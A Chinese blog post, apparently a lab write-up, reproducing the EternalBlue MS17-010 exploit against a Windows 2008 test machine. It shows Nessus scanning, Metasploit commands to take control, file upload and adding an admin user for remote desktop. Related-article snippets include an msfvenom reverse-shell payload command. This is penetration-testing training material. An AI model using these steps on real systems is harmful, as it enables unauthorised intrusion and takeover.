Windows靶机永恒之蓝MS17-010漏洞复现

最新推荐文章于 2024-05-29 11:22:22 发布
最新推荐文章于 2024-05-29 11:22:22 发布
阅读量2.1k 收藏 9
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞 靶机 安全 kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Stubborn_Lanmail/article/details/116713691
版权

文章目录

实验目标

扫描windows靶机漏洞,并使用MSF框架利用漏洞攻击靶机,最后成功获得靶机的控制权

实验环境

攻击机:kali 2020.3 (IP地址:192.168.146.147)
靶机:metasploitable3-win2k8r2(win2008,IP地址:192.168.146.145)

实验步骤

一、利用Nessus工具扫描靶机漏洞

  1. 在kali上安装Nessus
    从官网上直接下载安装包安装即可(注意版本)
    Nessus官网地址:https://www.tenable.com
  2. 点击右上角“New Scan”,然后在页面上选择“Basic Network Scan”,填入扫描名字和目标IP,点击“save”,之后启动扫描
    在这里插入图片描述在这里插入图片描述
  3. 扫描结果

在这里插入图片描述
这里我们选择MS17-010漏洞进行攻击

二、MS17-010漏洞复现(利用MSF框架)

  1. 启动MSF
msfconsole
  1. 搜索漏洞
search ms17-010

在这里插入图片描述

  1. 选择利用eternalblue模块(序号为0)
use 0

在这里插入图片描述

  1. 设置攻击参数(主机,端口号等)
set rhosts=192.168.146.145
//设置目标主机IP,端口号一般默认即可
  1. 查看攻击参数
show options
//检查是否有相关参数未设置

在这里插入图片描述

  1. 开始攻击(出现WIN说明可以完全控制靶机)
run

在这里插入图片描述
出现WIN,说明,我们已经成功拿到靶机的控制权

三、在攻击端对靶机进行控制

  1. 在攻击端上传文件到靶机c盘根目录下

(1)攻击端:创建文件并上传该文件至靶机C盘根目录

在这里插入图片描述

upload 文件路径 c:/

在这里插入图片描述
(2)在靶机端可以看到该文件
在这里插入图片描述
在这里插入图片描述

  1. 远程控制靶机桌面

(1)在kali端重新打开一个命令窗口输入:

rdesktop -u 用户名 -p 密码 ip
//靶机的用户名和密码

不知道用户名和密码的可以在kali端通过shell为靶机创建新的用户名和密码,并将新用户添加入管理组
在这里插入图片描述
(2)可以看到在kali端已通过远程桌面连接到目标靶机
在这里插入图片描述
(3)除了上面两种之外,真正能做的事情还有更多,所以一定要安装安全软件,定期打补丁

Stubborn_Lanmail
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
永恒之蓝ms17_010漏洞复现
m0_50317371的博客
12-08 684
一、永恒之蓝简介 ​永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代
hack the box blue靶机
zr1213159840的博客
04-15 1322
靶机名字叫blue,提示的漏洞编号是cve-2017-0144。这是永恒之蓝漏洞(EternalBlue)。 扫描一下,能发现打开了445等端口。有很多smb的信息。 nmap -sV -Pn -A 10.10.10.40 既然都知道是永恒之蓝了,直接利用吧,启动msf,然后搜索一下blue相关的。 search blue 第14个是RCE,我们选择 use 14 使用options看下需要配置哪些东西 需要配置远程主机,远程端口(已默认),本地主机。配置完成后直接RUN set RHOSTS
网络安全技术新手入门:利用永恒之蓝获取靶机控制权限
weixin_56154577的博客
01-09 1018
本文计较详细地介绍了利用永恒之蓝漏洞Windows系统进行攻击并且获得靶机控制权限的全过程,适合对网络安全技术感兴趣的新手小伙伴们
永恒之蓝MS17-010)详解
最新发布
m0_64481831的博客
05-29 867
SMB是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居都是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。SMB工作原理1、客户端发送一个SMB negport请求数据包,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可用的协议版本则返回0xFFFFH,结束通信。
渗透测试 靶机环境下载
zhyuxue的博客
09-09 1326
下载Linux应用程序虚拟机、Windows下载、metasploit下载
Nessus【部署 02】Windows部署漏洞扫描工具Nessus详细过程分享(下载+安装+注册+激活)
Java与大数据相关实践内容分享!
04-12 1251
Windows部署漏洞扫描工具Nessus详细过程分享(下载+安装+注册+激活)
永恒之蓝靶场
m0_46412408的博客
08-13 1849
模拟永恒之蓝攻击过程的话,需要win7(靶机)处于登录状态,来获取用户名和密码从而达到远程控制的目的,模拟hack已经打入内网与靶机处于同一网段(所以用ipcongfig来查看网关信息)输入run/exploit执行攻击(这个过程需要多等一会儿,如果这里出现问题去看看靶机的防火墙是不是开启了,把防火墙关闭再运行一下就好了)address 192.168.1.53 //配置eth0的固定IP地址,网段要和物理机的一样,且此IP未被使用。设置攻击主机的ip地址,显示配置信息。............
Metasploit(MSF)实战_永恒之蓝漏洞拿下win7靶机
monster663的博客
02-06 4683
声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安全法》,共同维护清朗的网络空间 一、Metasploit(MSF)简介 Metasploit与2003年由H.D.Moore发布,是一款开源的安全漏洞检测工具,通过它可以很容易的对计算机软件的漏洞实施攻击,其本身已经附带数百个已知的软件漏洞,从此,每个人都可以成为黑客,任何人都可以使用常见的攻击攻击一台计算机,软件厂商也不能够再推迟对于已经发布的漏洞的补丁。 Metasploit主要包含以下几个模块: 1.辅助模块(Aux
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
网络安全-实验三ms17-010漏洞利用.docx
11-10
MS17-010漏洞,也称为“永恒之蓝”(EternalBlue),是针对Microsoft Windows操作系统的一个严重漏洞,主要影响Windows XP、Windows 7以及Server 2003和2008等未打补丁的系统。该漏洞利用的是SMB(Server Message ...
渗透基础笔记+作业(永恒之蓝复现
09-08
MS17-010,也称为“永恒之蓝”,是一个著名的漏洞,主要影响Windows操作系统,尤其是Windows 7。复现环境通常包括攻击机(如Kali Linux)和靶机(如Windows 7)。工具如Nmap用于网络扫描,Metasploit则作为渗透框架...
渗透测试新手练习及高手深入挖掘专用LinuxWindows靶机(官方原版镜像)
05-08
本人学习时使用的的这两个系统,常见的高风险漏洞较多,容易利用,适合新手练习。 metasploitable-linux为常用的Linux靶机,系统包含了很多高风险漏洞、弱口令及容易利用的端口、服务,是渗透测试初学者练习技术的不二之选。 Windows_xp_pro_with_sp2就更不用说了,都被人挖烂了,sp2版本相比sp3更简单一些,适合新手练习。
永恒之蓝配置Windows7
10-24
Windows7 是一种广泛使用的操作系统,但它也存在一些漏洞,例如永恒之蓝漏洞MS17-010)。本文将讲解如何使用 Kali Linux 中的 MSF-Metasploit 来利用永恒之蓝漏洞入侵 Windows7 系统。 一、准备工作 在开始之前...
复现任务A
qq_42853814的博客
11-07 767
发现靶机的ip为192.168.124.138,不过这里我没有扫出靶机在80端口上执行着Easy File Sharing Web Server httpd服务。接下来我们利用溢出漏洞实现在靶机执行计算器程序,以/usr/share/exploitdb/exploits/windows/remote/39009.py为例。-o:存放payload.exe的路径,也可以把payload.exe放在root文件夹里,即/root/payload.exe。lhost=接收端的ip(你的kali的ip)。
MS17-010永恒之蓝漏洞复现
2201_76104311的博客
01-15 295
永恒之蓝漏洞复现
MS08-067靶机下载
边城浪子的博客
09-08 1655
利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,无奈没有靶机实验,真实的互联网中也没有这样的漏洞啊。 MS08-067靶机下载地址 链接: https://pan.baidu.com/s/13IS0vBZTduDHdInOrO4pyQ 提取码: ip53
Try hack me——永恒之蓝——ms17-010
m_de_g的博客
01-08 5489
Try hack me——永恒之蓝 1.开启靶场 2.开启完成后,可以在右边进行测试,由于平台是外国人开发的,可以借助翻译软件进行翻译(如:有道词典) 一、Recon模块 1.根据提示回答问题,使用nmap扫描 2.我们直接使用nmap对靶机进行扫描 nmap -A -v 10.10.240.121 3.通过扫描,可以知道目标靶机,开放了135,139,445,3389,49152,49153,49154,49158,49160等多个端口 4.可以回答第二个问题 How many ports
Vulnhub靶机下载和使用
laoyanCZ的博客
11-26 955
一、何为Virtualbox? ​​​​​Virtualbox跟Vmware一样,是创建虚拟机的软件,两者的功能基本上是一样的。 那我们为什么要安装Virtualbox呢?因为Vulnhub上面的靶机在导入到Virtualbox会稳定一些,基本上不会出现什么兼容性的问题,而导入到Vmware可能会报一些错误,就导致我们无法正常导入,所以我们一般都用Virtualbox来打开Vulnhub上的靶机。二、博主的渗透环境 博主一般都是习惯于kali安装在Vmware里面,
ms17-010漏洞复现
10-22
ms17-010漏洞是指微软Windows操作系统中的一个漏洞,黑客可以利用该漏洞远程执行代码,控制受感染的计算机。下面是ms17-010漏洞复现过程: 1. 使用nmap进行探测,发现开启445端口,该端口可能会存在MS17-010漏洞。 2. 使用MSF的永恒之蓝漏洞模块。 3. 使用ms17-010扫描模块,对靶机进行扫描。 4. 使用ms17-010攻击模块,对靶机进行攻击。 5. 得到靶机shell。 6. 通过shell对靶机进行控制。 需要注意的是,复现过程仅供学习和研究使用,请勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值